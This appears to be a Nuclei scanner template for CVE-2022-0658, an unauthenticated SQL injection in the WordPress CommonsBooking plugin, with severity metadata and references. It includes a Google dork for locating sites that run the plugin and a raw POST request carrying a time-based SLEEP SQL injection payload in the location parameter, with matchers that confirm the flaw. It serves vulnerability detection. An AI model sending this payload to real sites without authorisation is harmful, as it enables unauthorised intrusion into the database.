2023-10-17 07:20:28 +00:00
id : CVE-2022-0658
info :
name : CommonsBooking < 2.6.8 - SQL Injection
author : theamanrawat
severity : critical
description : |
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
remediation : Fixed in version 2.6.8
reference :
- https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
- https://wordpress.org/plugins/commonsbooking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0658
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-0658
cwe-id : CWE-89
metadata :
verified : true
2023-10-17 17:32:04 +00:00
google-query : inurl:/wp-content/plugin/commonsbooking/
2023-10-17 17:21:59 +00:00
max-request : 1
tags : cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
@timeout : 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
condition : and